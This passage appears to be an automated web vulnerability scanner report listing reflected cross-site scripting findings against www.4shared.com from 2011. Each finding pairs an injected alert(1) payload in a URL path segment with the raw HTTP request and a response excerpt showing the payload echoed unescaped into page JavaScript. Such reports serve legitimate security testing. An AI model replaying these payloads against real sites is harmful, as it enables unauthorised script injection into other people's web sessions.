Set-Cookie: JSESSIONID=DF2AC58AB7AE3A05AA5D1D5039C56108.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:41 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
d'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/banners/desktop/728x90.jspd5a0d'-alert(1)-'3fd2aaf8faa',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.233. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0759"-alert(1)-"b5db9f6f713 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78F6ABDF9E1F83884170846AE905EE6D.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:39 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.234. http://www.4shared.com/contact.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/contact.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dabbb"-alert(1)-"c3f9028a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.jspdabbb"-alert(1)-"c3f9028a5f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /contact.jspdabbb"-alert(1)-"c3f9028a5f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7605F5D00D0FE3651D892172B7D724A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/contact.jspdabbb"-alert(1)-"c3f9028a5f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.235. http://www.4shared.com/contact.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/contact.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0f37'-alert(1)-'66db9933f36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.jspe0f37'-alert(1)-'66db9933f36 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /contact.jspe0f37'-alert(1)-'66db9933f36
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CDE148CA97E58272D0B9730804445048.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/contact.jspe0f37'-alert(1)-'66db9933f36',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.236. http://www.4shared.com/css/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1a6"-alert(1)-"93e9e1ca1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /csscf1a6"-alert(1)-"93e9e1ca1ea/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /csscf1a6"-alert(1)-"93e9e1ca1ea/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9945AFA63F6156987186E12CABD47B3D.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:37 GMT
Content-Length: 36846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/csscf1a6"-alert(1)-"93e9e1ca1ea/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.237. http://www.4shared.com/css/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e41b'-alert(1)-'a61888d6504 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css2e41b'-alert(1)-'a61888d6504/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css2e41b'-alert(1)-'a61888d6504/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=08D35D516357088466C6200F6AC477AD.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:39 GMT
Content-Length: 36148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css2e41b'-alert(1)-'a61888d6504/common.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.238. http://www.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51356"-alert(1)-"0c3edb7ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.css51356"-alert(1)-"0c3edb7ca9f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/common.css51356"-alert(1)-"0c3edb7ca9f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF38715E34696F682B603791528F2490.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:48 GMT
Content-Length: 36833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/common.css51356"-alert(1)-"0c3edb7ca9f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.239. http://www.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac6b'-alert(1)-'7a6300020ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.cssdac6b'-alert(1)-'7a6300020ac HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/common.cssdac6b'-alert(1)-'7a6300020ac
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1119B8CB826E1B4763FD59FD49BCAA00.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:50 GMT
Content-Length: 36848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/common.cssdac6b'-alert(1)-'7a6300020ac',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.240. http://www.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c2e2'-alert(1)-'b7f2a8a11df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css1c2e2'-alert(1)-'b7f2a8a11df/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css1c2e2'-alert(1)-'b7f2a8a11df/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C41CBA4FF48A16021C4DA43ECC946A28.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:28 GMT
Content-Length: 36127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css1c2e2'-alert(1)-'b7f2a8a11df/main.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.241. http://www.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17143"-alert(1)-"8e70496ad1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css17143"-alert(1)-"8e70496ad1f/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css17143"-alert(1)-"8e70496ad1f/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C418A6718141B4DED03FB108B759A002.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css17143"-alert(1)-"8e70496ad1f/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.242. http://www.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6066'-alert(1)-'d4678c22b81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.cssf6066'-alert(1)-'d4678c22b81?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/main.cssf6066'-alert(1)-'d4678c22b81
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B9B078FB783D45BA72E1C0C574E66960.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:35 GMT
Content-Length: 36835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/main.cssf6066'-alert(1)-'d4678c22b81',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.243. http://www.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33c86"-alert(1)-"04029f7d211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css33c86"-alert(1)-"04029f7d211?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/main.css33c86"-alert(1)-"04029f7d211
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC79C3CAAAA22F8BA9BF7E8CB1C3AA7.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.css33c86"-alert(1)-"04029f7d211";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.244. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 138bc'-alert(1)-'e6c1ce58ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css138bc'-alert(1)-'e6c1ce58ee5/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css138bc'-alert(1)-'e6c1ce58ee5/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BBF3CCF9062298FFFEEA276AD7304F0C.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:45 GMT
Content-Length: 36889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css138bc'-alert(1)-'e6c1ce58ee5/mainWithoutCommon.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.245. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f987f"-alert(1)-"dff384d2e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D3153B42395E4699F91C0059655651A4.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:43 GMT
Content-Length: 36901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.246. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c20"-alert(1)-"0b7443b060a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA654DA392D19A26D4D4D21F2FB850BC.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:55 GMT
Content-Length: 36901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.247. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf346'-alert(1)-'a08deda319b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.csscf346'-alert(1)-'a08deda319b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.csscf346'-alert(1)-'a08deda319b
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2628CD3DDA9B5139484BB8B92897B41B.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:57 GMT
Content-Length: 36901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
= 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/mainWithoutCommon.csscf346'-alert(1)-'a08deda319b',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.248. http://www.4shared.com/desktop/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6d46'-alert(1)-'6d03b28270a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

